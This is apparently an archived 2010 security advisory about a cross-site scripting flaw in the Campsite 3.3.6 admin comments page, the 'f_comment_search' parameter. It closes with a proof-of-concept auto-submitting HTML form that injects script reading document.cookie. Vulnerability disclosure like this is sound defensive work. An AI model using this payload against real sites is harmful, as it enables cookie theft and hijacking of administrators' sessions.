[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS vulnerability in Campsite



Vulnerability ID: HTB22494
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_campsite.html
Product: Campsite
Vendor: Sourcefabric o.p.s ( http://www.sourcefabric.org/ ) 
Vulnerable Version: 3.3.6 and Probably Prior Versions
Vendor Notification: 16 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/admin/comments/index.php" script to properly sanitize user-supplied input in "f_comment_search" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/comments/index.php"; method="post" name="main" >
<input type="hidden" name="f_comment_per_page" value="20" >
<input type="hidden" name="f_comment_search" value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="f_comment_order_by" value="datestamp">
</form>
<script>
document.main.submit();
</script>
Solution: Upgrade to the most recent version